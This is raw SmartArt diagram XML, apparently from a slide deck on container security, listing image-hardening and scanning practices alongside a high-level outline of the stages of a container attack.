    <dgm:pt modelId="{65920F90-C8F0-45F9-AAAB-FFAEB6CF7B1E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>distroless or Alpine or Slim</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64ED3B7C-1166-4600-8F8B-20E8DCA56B76}" type="parTrans" cxnId="{A714C3C2-5BCD-4E86-BC72-CA0E43A06F4B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22B89B7B-93E8-48C5-B7F2-A31B03D4FEB4}" type="sibTrans" cxnId="{A714C3C2-5BCD-4E86-BC72-CA0E43A06F4B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFDAD2B3-E794-41ED-BB82-2005EF3D3F58}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>Remove unnecessary shells &amp; package managers</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D952ACB-AB68-44FC-9261-28DCAD6831E3}" type="parTrans" cxnId="{B7098AAF-2EF9-4FC7-8DA4-9A7E2563EA41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7891F18-CC9C-43CA-BDEB-AC905FD254D8}" type="sibTrans" cxnId="{B7098AAF-2EF9-4FC7-8DA4-9A7E2563EA41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E41134A-4E97-4F87-B6E4-54A35F0924DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>reduce attack surface</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{648AA1DB-1269-4481-B1DA-C04BADEE2669}" type="parTrans" cxnId="{E90C147D-57EE-48BB-909D-1CEDD3A2FC00}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D00F90E-BBA5-455B-A883-161818C676F8}" type="sibTrans" cxnId="{E90C147D-57EE-48BB-909D-1CEDD3A2FC00}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{390E1354-568B-46AE-B337-57AFA1719B96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>Scan &amp; patch vulnerabilities </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>before deployment </a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2AEB730-6ECE-469E-9D89-7DDAD553E9AF}" type="parTrans" cxnId="{F7FA32D2-5088-4415-8A3C-3056ACAB0D8E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0830C079-0428-4FDC-A34D-7CFD5F5047A0}" type="sibTrans" cxnId="{F7FA32D2-5088-4415-8A3C-3056ACAB0D8E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{920A9C31-9D22-4D67-B85B-4997D601CB54}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>Use scanning tools like </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>trivy, grype, docker-scout</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28569EF7-81B3-4B16-A557-73F893DDE963}" type="parTrans" cxnId="{9C1E1E8B-134A-4669-81B1-23CD82F6C8C5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A561FC4C-97BD-4CCA-957C-AD3793E327DA}" type="sibTrans" cxnId="{9C1E1E8B-134A-4669-81B1-23CD82F6C8C5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE0BF594-B1F4-47BC-923B-17F3B17501C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>Enforce </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>runtime restrictions</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{495D8ABA-7586-4D6C-A285-A314573217DD}" type="parTrans" cxnId="{D5E34631-D0F4-41FD-8016-C1AA2D8A4D5D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{75D2B478-A150-44D4-8FF9-0F9EE14467DD}" type="sibTrans" cxnId="{D5E34631-D0F4-41FD-8016-C1AA2D8A4D5D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B6CA65A-2B3B-4FC4-A869-657A593914EF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>non-root, seccomp, drop capabilities</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A399863-F33A-4DF1-B3C5-3A7B4C753B11}" type="parTrans" cxnId="{17BE0458-24D1-4C69-AA4D-0B0CFEC0D61B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EFE22F15-3512-466D-98BC-39DD91177AFD}" type="sibTrans" cxnId="{17BE0458-24D1-4C69-AA4D-0B0CFEC0D61B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D368697A-3404-4224-8DCF-BCF18AE9F4B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>Monitor &amp; alert</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07F1BE18-C029-4331-A95F-4B2F4C15F08C}" type="parTrans" cxnId="{58FE2DC7-BACE-41FF-82CB-7324D555B19F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F79E7901-87AC-470B-AC54-D3F77AD9A4EC}" type="sibTrans" cxnId="{58FE2DC7-BACE-41FF-82CB-7324D555B19F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{161CAE30-DA84-419E-9B4B-6B06552A37E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>suspicious behavior in logs or metrics</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB19FBD0-8CB8-4726-9ACF-F8E7C26468E0}" type="parTrans" cxnId="{7F78CC89-AA5C-4374-A500-BEF130B3ADE4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79CC98B2-A1C5-4E05-B55A-B439042C5C33}" type="sibTrans" cxnId="{7F78CC89-AA5C-4374-A500-BEF130B3ADE4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EBB2E11D-BCAE-6D49-B686-98859BD7611F}" type="pres">
      <dgm:prSet presAssocID="{6BB758CE-806A-4F8B-876D-6D75D2B62868}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B272C13A-D2BA-6544-9629-1C4241A7FF78}" type="pres">
      <dgm:prSet presAssocID="{050304B9-2A60-4120-8F7F-D56A2BF846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C6C857-DD17-D242-A03C-BC81066474FB}" type="pres">
      <dgm:prSet presAssocID="{050304B9-2A60-4120-8F7F-D56A2BF84697}" presName="childText" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E4D4CCB8-F03F-3240-B7D9-FAAA915218C9}" type="pres">
      <dgm:prSet presAssocID="{DFDAD2B3-E794-41ED-BB82-2005EF3D3F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5AEA87-2719-8341-A678-0C2BCD2E48C0}" type="pres">
      <dgm:prSet presAssocID="{DFDAD2B3-E794-41ED-BB82-2005EF3D3F58}" presName="childText" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CBA5556A-9182-3A42-9CAD-1B18E74E63AB}" type="pres">
      <dgm:prSet presAssocID="{390E1354-568B-46AE-B337-57AFA1719B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4A9C7F-273F-EA4A-830C-82B7CBA9F6CC}" type="pres">
      <dgm:prSet presAssocID="{390E1354-568B-46AE-B337-57AFA1719B96}" presName="childText" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C0C607F-4782-BE47-A489-C91E8E7670BA}" type="pres">
      <dgm:prSet presAssocID="{CE0BF594-B1F4-47BC-923B-17F3B17501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A4097BF-895B-AF41-A48C-A9FF9F99C32E}" type="pres">
      <dgm:prSet presAssocID="{CE0BF594-B1F4-47BC-923B-17F3B17501C9}" presName="childText" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68F3EABC-E254-2F4D-B586-73955AFD53F8}" type="pres">
      <dgm:prSet presAssocID="{D368697A-3404-4224-8DCF-BCF18AE9F4B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8BAF6B0-7AE2-2C4D-868B-41D14A413946}" type="pres">
      <dgm:prSet presAssocID="{D368697A-3404-4224-8DCF-BCF18AE9F4B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536C42B-8829-EC43-B83D-F808E61AC99D}" type="presOf" srcId="{0B6CA65A-2B3B-4FC4-A869-657A593914EF}" destId="{6A4097BF-895B-AF41-A48C-A9FF9F99C32E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6B3F4D2E-E811-F441-8F26-6DEE0D7A7982}" type="presOf" srcId="{D368697A-3404-4224-8DCF-BCF18AE9F4B7}" destId="{68F3EABC-E254-2F4D-B586-73955AFD53F8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D5E34631-D0F4-41FD-8016-C1AA2D8A4D5D}" srcId="{6BB758CE-806A-4F8B-876D-6D75D2B62868}" destId="{CE0BF594-B1F4-47BC-923B-17F3B17501C9}" srcOrd="3" destOrd="0" parTransId="{495D8ABA-7586-4D6C-A285-A314573217DD}" sibTransId="{75D2B478-A150-44D4-8FF9-0F9EE14467DD}"/>
    <dgm:cxn modelId="{114E1134-2ED0-DD48-9C4E-5DCFD66BA873}" type="presOf" srcId="{DFDAD2B3-E794-41ED-BB82-2005EF3D3F58}" destId="{E4D4CCB8-F03F-3240-B7D9-FAAA915218C9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DCE5E63A-C132-4028-A304-73B22941B5B8}" srcId="{6BB758CE-806A-4F8B-876D-6D75D2B62868}" destId="{050304B9-2A60-4120-8F7F-D56A2BF84697}" srcOrd="0" destOrd="0" parTransId="{8C74A482-0127-4ED9-B26E-B5D055B874DF}" sibTransId="{FA3F5AA2-9E33-421B-833C-3C83B6B233C3}"/>
    <dgm:cxn modelId="{BF03CB42-3684-7B49-8D83-1154D14561EC}" type="presOf" srcId="{161CAE30-DA84-419E-9B4B-6B06552A37E4}" destId="{08BAF6B0-7AE2-2C4D-868B-41D14A413946}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{17BE0458-24D1-4C69-AA4D-0B0CFEC0D61B}" srcId="{CE0BF594-B1F4-47BC-923B-17F3B17501C9}" destId="{0B6CA65A-2B3B-4FC4-A869-657A593914EF}" srcOrd="0" destOrd="0" parTransId="{1A399863-F33A-4DF1-B3C5-3A7B4C753B11}" sibTransId="{EFE22F15-3512-466D-98BC-39DD91177AFD}"/>
    <dgm:cxn modelId="{436B706E-EBA2-B94E-8470-2215B914F848}" type="presOf" srcId="{65920F90-C8F0-45F9-AAAB-FFAEB6CF7B1E}" destId="{5CC6C857-DD17-D242-A03C-BC81066474FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E90C147D-57EE-48BB-909D-1CEDD3A2FC00}" srcId="{DFDAD2B3-E794-41ED-BB82-2005EF3D3F58}" destId="{8E41134A-4E97-4F87-B6E4-54A35F0924DA}" srcOrd="0" destOrd="0" parTransId="{648AA1DB-1269-4481-B1DA-C04BADEE2669}" sibTransId="{0D00F90E-BBA5-455B-A883-161818C676F8}"/>
    <dgm:cxn modelId="{7F78CC89-AA5C-4374-A500-BEF130B3ADE4}" srcId="{D368697A-3404-4224-8DCF-BCF18AE9F4B7}" destId="{161CAE30-DA84-419E-9B4B-6B06552A37E4}" srcOrd="0" destOrd="0" parTransId="{EB19FBD0-8CB8-4726-9ACF-F8E7C26468E0}" sibTransId="{79CC98B2-A1C5-4E05-B55A-B439042C5C33}"/>
    <dgm:cxn modelId="{9C1E1E8B-134A-4669-81B1-23CD82F6C8C5}" srcId="{390E1354-568B-46AE-B337-57AFA1719B96}" destId="{920A9C31-9D22-4D67-B85B-4997D601CB54}" srcOrd="0" destOrd="0" parTransId="{28569EF7-81B3-4B16-A557-73F893DDE963}" sibTransId="{A561FC4C-97BD-4CCA-957C-AD3793E327DA}"/>
    <dgm:cxn modelId="{4CF971A7-D282-B441-9273-4F97E20B8077}" type="presOf" srcId="{920A9C31-9D22-4D67-B85B-4997D601CB54}" destId="{434A9C7F-273F-EA4A-830C-82B7CBA9F6CC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{88EA15AB-848B-4046-831D-0A146EE0CE1B}" type="presOf" srcId="{CE0BF594-B1F4-47BC-923B-17F3B17501C9}" destId="{6C0C607F-4782-BE47-A489-C91E8E7670BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B7098AAF-2EF9-4FC7-8DA4-9A7E2563EA41}" srcId="{6BB758CE-806A-4F8B-876D-6D75D2B62868}" destId="{DFDAD2B3-E794-41ED-BB82-2005EF3D3F58}" srcOrd="1" destOrd="0" parTransId="{6D952ACB-AB68-44FC-9261-28DCAD6831E3}" sibTransId="{E7891F18-CC9C-43CA-BDEB-AC905FD254D8}"/>
    <dgm:cxn modelId="{A714C3C2-5BCD-4E86-BC72-CA0E43A06F4B}" srcId="{050304B9-2A60-4120-8F7F-D56A2BF84697}" destId="{65920F90-C8F0-45F9-AAAB-FFAEB6CF7B1E}" srcOrd="0" destOrd="0" parTransId="{64ED3B7C-1166-4600-8F8B-20E8DCA56B76}" sibTransId="{22B89B7B-93E8-48C5-B7F2-A31B03D4FEB4}"/>
    <dgm:cxn modelId="{7E01E6C5-6F93-304A-839D-C259ABB2B3BC}" type="presOf" srcId="{6BB758CE-806A-4F8B-876D-6D75D2B62868}" destId="{EBB2E11D-BCAE-6D49-B686-98859BD7611F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{58FE2DC7-BACE-41FF-82CB-7324D555B19F}" srcId="{6BB758CE-806A-4F8B-876D-6D75D2B62868}" destId="{D368697A-3404-4224-8DCF-BCF18AE9F4B7}" srcOrd="4" destOrd="0" parTransId="{07F1BE18-C029-4331-A95F-4B2F4C15F08C}" sibTransId="{F79E7901-87AC-470B-AC54-D3F77AD9A4EC}"/>
    <dgm:cxn modelId="{F7FA32D2-5088-4415-8A3C-3056ACAB0D8E}" srcId="{6BB758CE-806A-4F8B-876D-6D75D2B62868}" destId="{390E1354-568B-46AE-B337-57AFA1719B96}" srcOrd="2" destOrd="0" parTransId="{C2AEB730-6ECE-469E-9D89-7DDAD553E9AF}" sibTransId="{0830C079-0428-4FDC-A34D-7CFD5F5047A0}"/>
    <dgm:cxn modelId="{75181FD9-A6F5-BD4A-A2DF-B2D53933FE30}" type="presOf" srcId="{8E41134A-4E97-4F87-B6E4-54A35F0924DA}" destId="{685AEA87-2719-8341-A678-0C2BCD2E48C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{33FEE2DB-DA48-F84F-994F-BF15AAF41B46}" type="presOf" srcId="{050304B9-2A60-4120-8F7F-D56A2BF84697}" destId="{B272C13A-D2BA-6544-9629-1C4241A7FF78}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4492E0E7-6ACA-ED4E-9D7E-7EA3CC3C499C}" type="presOf" srcId="{390E1354-568B-46AE-B337-57AFA1719B96}" destId="{CBA5556A-9182-3A42-9CAD-1B18E74E63AB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{823ADC2A-D20D-FA45-B3C1-63A4E7F141F6}" type="presParOf" srcId="{EBB2E11D-BCAE-6D49-B686-98859BD7611F}" destId="{B272C13A-D2BA-6544-9629-1C4241A7FF78}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{AD79FFE7-D846-BB41-BA5C-07EB88D54C65}" type="presParOf" srcId="{EBB2E11D-BCAE-6D49-B686-98859BD7611F}" destId="{5CC6C857-DD17-D242-A03C-BC81066474FB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{223126C3-85B8-0A4D-8659-9210374343B5}" type="presParOf" srcId="{EBB2E11D-BCAE-6D49-B686-98859BD7611F}" destId="{E4D4CCB8-F03F-3240-B7D9-FAAA915218C9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B3E89F62-0B78-E147-BB0A-4CD415692792}" type="presParOf" srcId="{EBB2E11D-BCAE-6D49-B686-98859BD7611F}" destId="{685AEA87-2719-8341-A678-0C2BCD2E48C0}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7975D8A5-2CF8-F141-BCE7-FF52410503B1}" type="presParOf" srcId="{EBB2E11D-BCAE-6D49-B686-98859BD7611F}" destId="{CBA5556A-9182-3A42-9CAD-1B18E74E63AB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{98A434EB-DD5A-9248-A39E-92DAC6F68F20}" type="presParOf" srcId="{EBB2E11D-BCAE-6D49-B686-98859BD7611F}" destId="{434A9C7F-273F-EA4A-830C-82B7CBA9F6CC}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{835AAAD1-8607-1342-8476-36E4E2852D94}" type="presParOf" srcId="{EBB2E11D-BCAE-6D49-B686-98859BD7611F}" destId="{6C0C607F-4782-BE47-A489-C91E8E7670BA}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BC67EF7C-A264-2447-A353-2283A2B1A8A6}" type="presParOf" srcId="{EBB2E11D-BCAE-6D49-B686-98859BD7611F}" destId="{6A4097BF-895B-AF41-A48C-A9FF9F99C32E}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{396F14EC-7058-C445-BCB8-A049F335AEEB}" type="presParOf" srcId="{EBB2E11D-BCAE-6D49-B686-98859BD7611F}" destId="{68F3EABC-E254-2F4D-B586-73955AFD53F8}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{AA6525FD-C286-5642-98A5-46F851961ED9}" type="presParOf" srcId="{EBB2E11D-BCAE-6D49-B686-98859BD7611F}" destId="{08BAF6B0-7AE2-2C4D-868B-41D14A41394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965B4-2471-194C-B3D6-D156970D7AF6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4954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Reconnaissance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>
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Scan container image or service for open ports, vulnerabilities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4954" y="1729450"/>
        <a:ext cx="1661352" cy="1729450"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B07A4C86-2F40-414F-8CA1-2C2045A73857}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="115747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AAA7C-D8CF-544E-864B-E78DE54C693B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1716147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Exploitation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>
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Exploit a known CVE or insecure app endpoint (e.g., command injection).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1716147" y="1729450"/>
        <a:ext cx="1661352" cy="1729450"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3F81B835-4C24-9A4D-8D0C-C6F0F597E591}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1826940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27108-F4F5-AB46-AA25-C9F7D182453D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3427340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Execution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>
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Run commands inside container (needs a shell or utility like curl or python).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3427340" y="1729450"/>
        <a:ext cx="1661352" cy="1729450"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B4BCE903-7ACB-4A43-A8BA-0C6500D44DB4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3538133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48490-D903-DA46-B318-C250CC1A4043}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5138533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Escalation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>
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Gain higher privileges (e.g., use CAP_SYS_ADMIN, access host).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5138533" y="1729450"/>
        <a:ext cx="1661352" cy="1729450"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{543CCDCA-6B41-7444-903F-2B020C5293E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5249325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783E3-D91D-6740-A0AD-BAA9D164EC67}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6849726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Persistence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>
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Install backdoors, create rogue processes or </a:t>
          </a:r>
          <a:r>
